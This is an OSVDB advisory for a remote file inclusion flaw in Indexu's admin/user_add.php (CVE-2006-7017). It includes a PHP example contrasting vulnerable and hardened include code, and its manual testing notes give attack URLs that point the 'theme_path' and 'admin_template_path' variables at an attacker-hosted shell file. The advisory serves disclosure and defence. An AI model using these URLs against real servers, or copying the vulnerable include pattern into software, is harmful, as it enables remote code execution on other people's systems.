Indexu admin/user_add.php Multiple Variable Remote File Inclusion

2006-06-16T22:20:52
ID OSVDB:28393
Type osvdb
Reporter Khamaïleon (Hackmaileon@hotmail.com), King-Hacker (King-Hacker@hotmail.fr)
Modified 2006-06-16T22:20:52

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/user_add.php script not properly sanitizing user input supplied to the 'theme_path' and 'admin_template_path' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.
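The following is an added illustration written for this entry; it is not Indexu's code and is not taken from the advisory. It shows the general include pattern the description refers to (a request-controlled path passed straight to include) next to a hardened form that accepts only a theme name and resolves it inside a fixed directory. The function names, the 'themes' directory and the 'header.php' file are assumptions for illustration.

```php
<?php
// Added example (not Indexu's code). Names below are illustrative assumptions.

// Vulnerable pattern: a request-supplied value becomes the include path.
// If PHP is permitted to open URLs for include (allow_url_include / allow_url_fopen),
// a value such as http://host/file.txt is fetched and executed as PHP.
function render_vulnerable(array $get): void
{
    $theme_path = $get['theme_path'] ?? 'themes/default';
    include $theme_path . '/header.php';
}

// Hardened pattern: the request supplies only a short theme *name*.
// The name is restricted to a safe character set, joined to a fixed base
// directory, and the resolved path is verified to stay inside that base.
function resolve_theme(string $name, string $base): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $name)) {
        throw new InvalidArgumentException('invalid theme name');
    }
    $baseReal  = realpath($base);
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($baseReal === false
        || $candidate === false
        || !is_dir($candidate)
        || strpos($candidate, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('unknown theme');
    }
    return $candidate;
}

function render_hardened(array $get): void
{
    $name = $get['theme'] ?? 'default';           // a name, never a path or URL
    $dir  = resolve_theme($name, __DIR__ . '/themes');
    include $dir . DIRECTORY_SEPARATOR . 'header.php';
}

// Illustrative calls (constructed input):
// render_hardened(['theme' => 'default']);            // includes themes/default/header.php
// render_hardened(['theme' => 'http://x/y.txt']);     // throws: invalid theme name
// render_hardened(['theme' => '../admin']);           // throws: invalid theme name
```

The check in resolve_theme is defence in depth: the character allowlist already rejects URL schemes and path separators, and the realpath comparison catches anything that still resolves outside the themes directory. On current PHP builds, keeping allow_url_include disabled (its default) removes the remote-fetch half of this flaw at the interpreter level, but the code-level fix is what makes the include safe regardless of configuration.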

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin/user_add.php script not properly sanitizing user input supplied to the 'theme_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[directory_of_INDEXU]/admin/user_add.php=[attacker]/[shell].txt?

http://[target]/indexu/admin/user_add.php?admin_template_path=http://evilcode.txt?

References:

Vendor URL: http://www.nicecoder.com/
Vendor URL: http://www.nicecoder.com/idx_main.php
Security Tracker: 1016330
Security Tracker: 1016331
Secunia Advisory ID: 18752
Related OSVDB ID: 28385
Related OSVDB ID: 28396
Related OSVDB ID: 28398
Related OSVDB ID: 28399
Related OSVDB ID: 28390
Related OSVDB ID: 28395
Related OSVDB ID: 28397
Related OSVDB ID: 28403
Related OSVDB ID: 28386
Related OSVDB ID: 28389
Related OSVDB ID: 28392
Related OSVDB ID: 28394
Related OSVDB ID: 28400
Related OSVDB ID: 28401
Related OSVDB ID: 28384
Related OSVDB ID: 28387
Related OSVDB ID: 28388
Related OSVDB ID: 28391
Related OSVDB ID: 28402
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html
ISS X-Force ID: 27263
ISS X-Force ID: 27262
Generic Exploit URL: http://ftp.kep.online.fr/Indexu_5.0.1_File_Inclusion_Exploit-by_King-Hacker_and-Khamaileon.txt
CVE: CVE-2006-7017